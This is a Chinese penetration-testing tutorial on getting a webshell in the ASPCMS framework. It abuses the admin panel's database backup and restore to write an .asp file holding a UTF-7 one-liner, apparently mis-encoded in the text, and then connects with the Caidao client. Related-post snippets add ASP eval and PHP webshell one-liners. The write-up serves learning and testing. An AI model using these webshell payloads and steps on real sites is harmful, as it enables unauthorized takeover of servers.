文章目录

  • 渗透测试-地基篇-Webshell-Aspcms框架(十)
  • 一、登录演示
  • 二、数据库备份拿webshell

一、登录演示

本次演示一种方法思路拿aspcms框架的webshell,该页面是用的是最新版本的aspcms框架自行搭建演示的。

1)登录地址:http://www.aspcms.com/admin_aspcms/

2)登录后的页面:

二、数据库备份拿webshell

登录到扩展功能-数据库备份恢复:

首先打开内容维护中栏目都可以插入一句话,修改即可:

插入utf7一句话:

uft7 一句话┼攠數畣整爠煥敵瑳∨≡┩愾

然后开始备份数据库:

在点击恢复此备份:

aspcms默认的这个数据库名是:#5Dp8Gh.asp改为%235Dp8Gh.asp
访问:http://www.aspcms.com/data/%235Dp8Gh.asp

在内容中出现:ÀàÐͲ»Æ¥Åä: 'execute’表示写入一句话
成功利用caidao连接:

Aspcms框架的webshell相关推荐

  1. PHPcms框架的Webshell

    登录界面 后台网址 www.phpcms.com/admin.php 进入主页面 代码注入拿webshell 接下来 我直接就上图了 写入一句话木马 <?php file_put_content ...

  2. 织梦dedecms的框架的Webshell

    一.后台 后台登录 http://www.dedecms.com/dede 后台界面 二.Webshell方法 1:文件上传 蚁剑进行连接 成功 2:新建一句话文件 蚁剑连接 3:html修改 打开模 ...

  3. xyCMS框架的webshell

    "%><%eval request("d")%><%s=" 在网站配置页面插入一句话.(注意一定要把前后内容闭合,不然整个网站都要崩溃) ...

  4. Veil生成免杀payload 渗透win10 获取靶机shell

    一:实验环境 两台机器处于同网段 攻击机:kali 192.168.115.134 靶机:win10 192.168.115.1 二:Veil下载.安装.使用 kali里默认没有安装Veil,我们通过 ...

  5. Burp Collaborator 使用总结

    0x00:使用原因 我们在做渗透测试的时候,经常会遇到这种情况,测试跨站可能有些功能插入恶意脚本后无法立即触发,例如提交反馈表单,需要等管理员打开查看提交信息时才会触发,或者是盲注跨站,盲打 XSS ...

  6. BBScan:信息泄漏批量扫描脚本

    有些朋友手上有几十万甚至上百万个域名,如果把这些域名全部扔给wvs. APPscan这样的重型扫描器,显然是不太合适的. 对于一个拥有上万IP的企业,又如何快速定位可能存在弱点的机器呢? 试试信息泄漏 ...

  7. jexboss工具 -- JBOSS未授权访问漏洞利用

    其实所有的节日,都不是为了礼物和红包而生,而是提醒我们不要忘记爱与被爱,生活需要仪式感,而你需要的是在乎和关爱... ----  网易云热评 小受:Ubuntu20 小攻:Kali2020 一.搭建该 ...

  8. 逍遥模拟器配置burpsuite抓包环境

    电脑与逍遥模拟器处于同一网段,在burpsuite中设置代理: 之后在逍遥模拟器中设置网络代理 之后直接下载下面的证书并且将其拖放到逍遥模拟器中: 证书下载地址: 链接:https://pan.bai ...

  9. BurpSuite v2021.8.2安装使用

    文章前言 几个月之前,Burpsuit官方发布了BurpSuite v2021.8.2,但是迟迟没有时间来试试手,正好借着这次调休的时间来写写文章,顺便更新一下Burpsuite 软件下载 天翼云盘 ...

最新文章

  1. C语言语句单选题,C语言练习题
  2. python编程基础与应用-Python编程基础与应用
  3. 石川es6课程---3、变量let和常量const
  4. Python网络数据采集
  5. redis 启动_Redis介绍amp;安装amp;启动
  6. [C++基金会]位计算 游戏开发中的应用
  7. [SDOI2016] 生成魔咒(后缀数组SA + st表 + set)动态不同子串个数
  8. http 请求头 header Referer 含义和作用
  9. 图像处理------图像细化
  10. CMake中的ARGC ARGV 和ARGN参数意义
  11. 论有一个服务器后可以干什么
  12. OpenGL基础42:实例化
  13. dede 鼠标移到标题处显示完整标题
  14. 这几个刺激的公众号 能让你怀疑人生
  15. # 20145205 《Java程序设计》第1周学习总结
  16. 【跃迁之路】【648天】程序员高效学习方法论探索系列(实验阶段405-2018.11.21)...
  17. DPDK示例l3fwd性能测试
  18. 风尚云网学习篇-介绍chrome 浏览器的几个版本
  19. Segment routing分段路由
  20. labelme标记图像时JSON标签复制

热门文章

  1. 怎么讲服务器上的文件装进电脑,怎么把电脑文件放进云服务器
  2. 单片机float数发给上位机_上位机倒计时器
  3. python登录页面_Python:简单的登陆GUI界面
  4. python中什么叫合法的标识_python合法标识符要求是什么
  5. 实现任意行数的杨辉三角
  6. python用psf函数_python学习之-类的内置函数
  7. 真实收货地址大全2016_中国古典诗词大全汇集了诗经、唐诗、宋词、元曲以及纳兰词,12册精美套装。...
  8. c语言实现二分法_C语言实现二分法求解方程在区间内的根
  9. Mongodb 分片与副本集
  10. linux bash tutorial